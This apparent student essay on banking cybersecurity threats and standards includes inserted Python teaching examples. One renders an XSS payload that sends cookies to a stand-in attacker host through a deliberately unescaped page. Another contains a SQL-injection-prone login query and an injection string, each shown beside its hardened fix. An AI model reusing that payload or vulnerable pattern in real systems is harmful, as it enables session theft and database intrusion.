Industry Comments and Proposed Cyber Standards
- Pages: 9
- Word count: 2043
- Category: Identity Theft
In the current digital age, more people are putting their personal information online. For instance, financial institutions’ customers no longer stand in queues for banking services. Instead, they connect to the Internet, access their accounts and transact online. This trend has improved convenience. However, it has led to more people being targeted by criminals engaging in cybercrime (Mba et al., 2017). According to a study conducted by B2B International in collaboration with Kaspersky Lab at financial institutions, it was determined that criminals exploit the banking industry’s vulnerabilities to illegally access personal data and steal money. The banks have consequently identified ways to protect their data and information from cyber threats. The research found that primary concerns in the industry include the following:
| Issue in the financial sector | Percentage |
| --- | --- |
| Attacks on online or digital banking products | 45% |
| Threats on point of sale systems (POS) | 40% |
| Phishing and social engineering (attackers steal and use authorized credentials to contact banks) | 35% |
| Attacks on back office solutions (transactional systems) | 35% |
| Threats on automated teller machines (ATMs) | 26% |
Table 1: Top cybersecurity concerns in the banking sector (“Cybersecurity in Financial Institutions,” 2017)
In 2016, phishing in the financial sector stood at 47.48% for Windows and 31.38% for Mac operating systems, the highest figures recorded, according to Kaspersky Lab data analysis. Furthermore, during the same period, the number of attacks caused by Trojans amounted to more than a million. Android malware also increased by 430% due to a bug in a commonly used mobile browser.
The above statistics show how institutions dealing with money constantly remain cybersecurity targets. The losses caused by attacks have an impact on both the banking firms and their customers. Consequently, financial institutions must invest heavily in cybersecurity to protect their information assets in the digital era. Kaspersky Lab statistics summarize the investment as shown in the graph below:
Figure 1: Cybersecurity investments in the banking and non-banking sectors (“Cybersecurity in Financial Institutions,” 2017)
A report by PwC’s Financial Services Institute on cybersecurity in the financial industry indicates that as cybercrime and threats become more sophisticated, the regulators and banks are raising their scrutiny levels. Furthermore, international privacy and cybersecurity legislation is improving. Today, financial institutions are required to be compliant with additional standards, such as the CFTC and NYDFS. Additionally, the Fed, FDIC and OCC have collaborated to develop and introduce proposed rules for managing cybersecurity in the industry (“Cybersecurity in Financial Services,” 2017). Notably, these policies are most crucial to the sectors that hold money. However, many companies offering financial services still struggle to comply and observe the guidelines.
Maintaining regulatory compliance is a critical and continuous issue for firms offering financial services. However, it is important to adopt such policies to be able to protect information databases and networks. Policies can either be local, based on a firm’s requirements and mission, or general to accommodate other stakeholders. Regulators such as the International Organization for Standardization (ISO) are responsible for developing security standards for a particular industry. Accordingly, banks and other financial institutions need to adopt policies to implement the industry standards.
Currently, the Federal Trade Commission (FTC) reports that 10 million people become victims of identity theft every year in the US (“Cybersecurity Standards Organizations,” n.d.). Markedly, cybersecurity standards and policies are developed and implemented to provide guidance for network and data protection. The process involves the collaboration of federal departments, international bodies and nongovernmental institutions. Policies must be created to control user activities, establish accountability, identify roles and ensure the smooth operation of a business. A central policy structure can be established to control and manage the development and implementation of various policies. Most importantly, the adopted standards and implementing policies must be synchronized with the firm’s vision and objectives.
Various bodies and acts are involved in the development of standards that affect online security. In the first instance, the National Institute of Standards and Technology (NIST) is responsible for developing and publishing computer systems standards and guidelines for the country. The 1987 Computer Security Act (CSA) passed by Congress relies on NIST for the creation of procedures for protecting information in computers. Secondly, the Federal Information Security Management Act (FISMA) of 2002 ensures the security of information in the federal government. Similarly, FISMA gives NIST authority to create and publish security guidelines for the systems used by government. Thirdly, the ISO has developed international standards relating to information technology and business operations. For example, the ISO has created the ISO/IEC 17799:2005 standard that provides principles for starting, designing, adopting, evaluating and improving security management solutions at enterprises (“Cybersecurity Standards Organizations,” n.d.).
Kitten (2010) notes that the banking industry continues to evaluate, understand, and deploy existing guidelines and standards to emerging business models. Entities continue to engage stakeholders to improve security. However, as the Internet and its related technologies continue to evolve, particular regulatory concerns arise. Since technology is evolving fast, it creates a business platform whose security issues have not been attended to fully. The industry cybersecurity standards need to deal with changes in the IT field. For instance, the Internet has evolved from IPv4 to IPv6 and mobile technology has emerged. Such cases require a restructuring of standards. Deloitte reports note that cyber threats evolve too quickly for the legislature to act on them in a timely manner. In effect, regulators are solving the issue by releasing reliable standards and expecting adherence from financial institutions (“Forward Look,” 2015).
Additionally, many banks face challenges in deploying solid governance plans in line with regulatory requirements. Bodies such as the Federal Reserve Board (FRB) and the Office of the Comptroller of the Currency (OCC) have released the Enhanced Prudential Standards (EPS) and the Heightened Standards (HS) respectively for banking operations (“Forward Look,” 2015). However, a report by Deloitte notes that gaps may exist between regulatory risk control requirements and a firm’s practices.
Devices connected to the World Wide Web are threatened by attacks from hackers. Surprisingly, attackers take 30 milliseconds to gain unauthorized access to a computer or mobile phone connected to the Internet (“Countermeasures,” n.d.). Threats are created by technical, legal and policy factors at a firm. As such, cybersecurity has become a challenging and expensive affair for organizations that lack proper preparation. On the other hand, lack of information security at a bank may result in an attack that leads to loss of shareholder value, money and valuable data. Technical threats include unpatched software, hardware configuration, poor security policies and technology flaws in banks’ applications. Secondly, SQL injection is a code-level attack in which crafted user input is passed into database queries, giving the attacker access to an unsecured database. Frequently, financial institutions use web and mobile applications that are susceptible to SQL injection. Cross-site scripting (XSS) is another threat, in which a cookie is stolen at the application layer. An attacker uses a client’s browser to forward cookies to a malicious destination. XSS attacks cause identity theft by modifying information on a financial firm’s website to open malicious pages. Unsuspectingly, a user will share credentials with the attacker masquerading as the bank. Other attacks caused by the XSS threat include access to paid content, public defamation, denial of service, and browser spying (“Countermeasures,” n.d.).
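The XSS mechanism described above, as an added example that is not part of the original essay or of any cited source: a page that reflects a user-controlled display name without encoding it, beside the hardened rendering that encodes the output, plus a checker that reports whether a session cookie carries the attributes that keep script from reading it or the network from exposing it. The cookie name, the page template and the Set-Cookie headers are constructed for the demonstration.

```python
import html
from http.cookies import SimpleCookie


def render_greeting_vulnerable(display_name):
    # Reflects user-controlled text straight into the HTML: markup or script in the
    # name becomes part of the page and runs with the bank's origin.
    return f"<p>Welcome back, {display_name}</p>"


def render_greeting_hardened(display_name):
    # Output encoding: <, >, &, and quotes are turned into entities, so the browser
    # displays the characters instead of parsing them as tags or attributes.
    return f"<p>Welcome back, {html.escape(display_name, quote=True)}</p>"


def session_cookie_findings(set_cookie_header):
    # Parses one Set-Cookie header the way a browser would and lists the
    # protections a session cookie should carry but does not.
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    findings = []
    for name, morsel in jar.items():
        if not morsel["httponly"]:
            findings.append(f"{name}: missing HttpOnly (readable by page script)")
        if not morsel["secure"]:
            findings.append(f"{name}: missing Secure (would be sent over plain HTTP)")
        if not morsel["samesite"]:
            findings.append(f"{name}: missing SameSite (sent on cross-site requests)")
    return findings


if __name__ == "__main__":
    # Constructed sample input: a display name carrying a script tag, and two
    # Set-Cookie headers, one weak and one hardened.
    payload = "<script>document.location='https://attacker.invalid/?c='+document.cookie</script>"
    print(render_greeting_vulnerable(payload))
    print(render_greeting_hardened(payload))
    for header in (
        "sessionid=abc123; Path=/",
        "sessionid=abc123; Path=/; HttpOnly; Secure; SameSite=Strict",
    ):
        print(header, "->", session_cookie_findings(header) or "ok")
```

The HttpOnly attribute is the direct control against the cookie-forwarding step the essay describes: even when script does run in the page, it cannot read a cookie the browser holds as HttpOnly. Output encoding removes the script from the page in the first place.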
The banking sector deploys various countermeasures to control and eliminate vulnerabilities identified in computer systems used by financial institutions. The countermeasure deployed depends on the nature and impact of a threat. For instance, IT controls are used to eliminate vulnerabilities in information systems: banks may install firewalls and antivirus software to prevent unauthorized traffic and viruses from attacking the network or computers. Other IT controls include setting strong passwords and following good programming practices. Other security approaches include technical countermeasures that involve physical security to eliminate threats that attack a bank’s infrastructure. Financial institutions should validate user input in mobile and web applications that access a backend database. Lack of this countermeasure gives a hacker an opportunity to modify SQL queries to access a database and disclose critical information or initiate a denial of service attack.
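The input-validation countermeasure above, as an added example that is not part of the original essay or of any cited source: a login lookup that splices user input into the SQL text, beside a hardened version that validates the input against an allowlist and then sends the values to the database separately from the query through a parameterised statement. The in-memory table, the customer records and the PIN format are constructed for the demonstration (PINs are stored in clear only to keep the table small).

```python
import re
import sqlite3


def build_demo_db():
    # Constructed sample data: a tiny in-memory table standing in for a core banking store.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, pin TEXT, balance REAL)")
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?, ?)",
        [("alice", "1234", 5000.0), ("bob", "9876", 120.5)],
    )
    return conn


def vulnerable_login(conn, username, pin):
    # The pattern the essay warns about: user input becomes part of the SQL text, so
    # the input can change the structure of the query rather than only its values.
    query = (
        "SELECT username, balance FROM customers "
        f"WHERE username = '{username}' AND pin = '{pin}'"
    )
    return conn.execute(query).fetchall()


# Allowlists for the two fields (hypothetical formats chosen for the demo).
USERNAME_RE = re.compile(r"^[a-z0-9_]{3,32}$")
PIN_RE = re.compile(r"^[0-9]{4,6}$")


def hardened_login(conn, username, pin):
    # Countermeasure 1: validate the input before it reaches the database; anything
    # outside the expected alphabet is rejected outright.
    if not USERNAME_RE.match(username) or not PIN_RE.match(pin):
        return []
    # Countermeasure 2: parameterised query. The SQL text is fixed; the driver passes
    # the values separately, so quotes in the input can never close the string literal.
    query = "SELECT username, balance FROM customers WHERE username = ? AND pin = ?"
    return conn.execute(query, (username, pin)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    # A PIN that is not a PIN: it closes the literal and appends an always-true clause.
    bad_pin = "' OR '1'='1"
    print("vulnerable, real PIN :", vulnerable_login(db, "alice", "1234"))
    print("vulnerable, crafted  :", vulnerable_login(db, "alice", bad_pin))  # every row
    print("hardened, crafted    :", hardened_login(db, "alice", bad_pin))    # nothing
    print("hardened, real PIN   :", hardened_login(db, "alice", "1234"))
```

Either control alone blocks this particular input; both are kept because validation protects the rest of the application (logging, templates, downstream services) while parameterisation protects the query even when a validation rule is later loosened.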
After a threat has occurred, investigators collect digital evidence for admissibility during a judicial process. It involves the collection, sharing, and storage of digital information. Today, electronic data has become a critical source of information. In effect, regulators and law enforcement departments must identify and understand methods for collecting and handling digital evidence (“Digital Evidence,” n.d.).
Specific regulatory issues are being encountered in financial services concerning cybersecurity policies, SQL injection, countermeasures, digital evidence, cyberattacks, cloud computing, mobile technologies and the Gramm-Leach-Bliley Act. Firstly, cybersecurity policies for financial institutions will improve and get tougher. Regulators have been pushing for the enactment of reliable security requirements. For instance, New York authorities have continually improved security policies for banks operating under its jurisdiction (Crosman, 2016).
Banks furthermore fail to take IT experts’ perspectives into account during their operations. However, such an approach can ensure ease of system integration and compatibility. As a result, firms are operating on weak TLS cipher suites, expired SSL certificates and open SMB and FTP ports. Such issues are sources of threats that leave financial institutions open to hackers’ activities. For instance, a client device with an expired SSL certificate is at risk of phishing attacks. Notably, a bank usually runs on large infrastructure, making a security audit a tedious process. However, it is necessary to track and assess banking systems and networks to keep them secure.
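The audit the paragraph calls for, as an added example that is not part of the original essay or of any cited source: a check that runs over an inventory of a bank's own hosts and flags the three conditions named above (expired certificates, TLS versions below the minimum the policy allows, and FTP or SMB reachable from the Internet), together with the client-side TLS context a bank's own applications should use. The inventory records, host names, expiry dates and the prohibited-port list are constructed for the demonstration; the certificate dictionaries mirror the `notAfter` field that `ssl.SSLSocket.getpeercert()` returns.

```python
import ssl
import time

# Audit policy (hypothetical baseline for the demo, not a published standard).
MIN_TLS_VERSION = ssl.TLSVersion.TLSv1_2
PROHIBITED_EXPOSED_PORTS = {21: "FTP", 445: "SMB"}
EXPIRY_WARNING_DAYS = 30


def hardened_client_context():
    # What a bank's own client software should negotiate: certificates verified
    # against the trust store, host name checked, nothing older than TLS 1.2.
    ctx = ssl.create_default_context()
    ctx.minimum_version = MIN_TLS_VERSION
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def certificate_days_remaining(cert, now_epoch):
    # `cert` mirrors the getpeercert() dict; only 'notAfter' is needed here.
    expiry_epoch = ssl.cert_time_to_seconds(cert["notAfter"])
    return (expiry_epoch - now_epoch) / 86400.0


def audit_host(record, now_epoch):
    # Returns one finding string per policy violation on a single host record.
    findings = []
    days = certificate_days_remaining(record["cert"], now_epoch)
    if days < 0:
        findings.append(f"certificate expired {-days:.0f} days ago")
    elif days < EXPIRY_WARNING_DAYS:
        findings.append(f"certificate expires in {days:.0f} days")
    weak = [v.name for v in record["tls_versions_offered"] if v < MIN_TLS_VERSION]
    if weak:
        findings.append(f"offers {', '.join(weak)} below {MIN_TLS_VERSION.name}")
    for port in record["open_ports"]:
        if port in PROHIBITED_EXPOSED_PORTS:
            findings.append(f"{PROHIBITED_EXPOSED_PORTS[port]} (port {port}) exposed")
    return findings


# Constructed sample inventory: one healthy host and one legacy gateway.
SAMPLE_INVENTORY = [
    {
        "host": "online-banking.example.test",
        "open_ports": [443],
        "tls_versions_offered": [ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3],
        "cert": {"notAfter": "Jan  5 09:59:03 2030 GMT"},
    },
    {
        "host": "legacy-gateway.example.test",
        "open_ports": [21, 443, 445],
        "tls_versions_offered": [ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_2],
        "cert": {"notAfter": "Jan  5 09:59:03 2020 GMT"},
    },
]


def audit_inventory(inventory, now_epoch):
    # Maps each host name to its findings; hosts with no findings map to an empty list.
    return {rec["host"]: audit_host(rec, now_epoch) for rec in inventory}


if __name__ == "__main__":
    for host, findings in audit_inventory(SAMPLE_INVENTORY, time.time()).items():
        print(host, "->", findings or "ok")
```

In a real audit the inventory would be filled from the bank's own asset register and from the `getpeercert()` result of a connection made with `hardened_client_context()`; the policy checks stay the same, which is what makes the audit repeatable across a large estate.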
A particular issue faced in the industry involves the use of legacy systems that are no longer improved or supported by service providers. Further, an operating system may not be updated. These are some of the loopholes tested by cyber-criminals to detect weak points for infiltration. Further, banks may run on unpatched or expired firewalls and intrusion detection systems. Attacks launched through third-party vendors also threaten financial institutions. For instance, hackers can manipulate an email service used by a firm to initiate an attack. In addition, cloud computing service providers may lack the proper mechanism needed to protect information belonging to a financial services company. Agreeably, third party service providers offer necessary facilities and services to banks.
Project Practice – offshore database server operated by a cloud service provider. Unfortunately, hackers can manipulate the process of sharing personal information with third parties for financial gain.
Banks should consequently adopt policies that are in line with the GLBA to prevent the disclosure of personal data to non-affiliated organizations. The standard proposed in this document offers guidelines for implementation of policies that focus on prevention of cyber-attacks. The act covers both the business and the technical approaches required to secure private data. It requires firms to disclose their policies for sharing customer data. In addition, the act requires banks to develop reliable security programs. Overall, the proposed standard will follow a stepwise implementation procedure that requires the responsible entity to identify critical cyber assets, assign roles, establish the information handled by the IT assets, develop physical and logical security and access controls, and train workers.
- Countermeasures. (n.d.). University of Maryland University College. Retrieved from https://lti.umuc.edu/contentadaptor/topics/byid/4828d674-2138-4ce2-9ec5-672125ee459b
- Crosman, P. (2016, January 5). Are you ready for the cybersecurity challenges of 2016? American Banker. Retrieved from https://www.americanbanker.com/news/are-you-ready-for-the-cybersecurity-challenges-of-2016
- Cybersecurity in financial institutions 2016 – and what 2017 holds. (2017, March 27). Kaspersky Lab Business. Retrieved from https://business.kaspersky.com/from-the-perils-to-strategies/6682/
- Cybersecurity in financial services. (2017). PwC’s Financial Services Institute. Retrieved from http://www.pwc.com/us/en/financial-services/research-institute/cybersecurity.html
- Cybersecurity standards organizations. (n.d.). University of Maryland University College. Retrieved from https://lti.umuc.edu/contentadaptor/topics/byid/7c58564e-ecc6-4ebb-8040-5cdeb02ceaef
- Digital evidence. (n.d.). University of Maryland University College. Retrieved from https://umuc.equella.ecollege.com/file/6aa8bfb8-7053-4fed-94f6-2547e454c501/1/web/viewer.html?file=https://umuc.equella.ecollege.com/file/380e3a03-157b-433c-8584-b537337de0d0/1/DigitalEvidence.pdf
- Forward look. (2015). Deloitte Center for Regulatory Strategies. Retrieved from https://www2.deloitte.com/content/dam/Deloitte/us/Documents/finance/us-outlooks-top-regulatory-trends-for-2016-in-banking-reg.PDF
- Kitten, T. (2010, October 29). Cybersecurity: A growing concern. Bank Info Security. Retrieved from http://www.bankinfosecurity.com/interviews/cybersecurity-growing-concern-i-811
- Mba, G., Onaolapo, J., Stringhini, G., & Cavallaro, L. (2017). Flipping 419 cybercrime scams: Targeting the weak and the vulnerable. International World Wide Web Conference Committee (IW3C2), April 3-7. Retrieved from http://www0.cs.ucl.ac.uk/staff/J.Onaolapo/papers/wwwcybersafety2017scam.pdf
- Mohapatra, S., Sahoo, D., & Kesharwani, A. (2015). Outsourcing of information technology: An empirical study of the Indian banking industry. Indian Journal of Finance, 9(7).
- Rouse, M. (n.d.). Gramm-Leach-Bliley Act (GLBA). TechTarget Network. Retrieved from http://searchcio.techtarget.com/definition/Gramm-Leach-Bliley-Act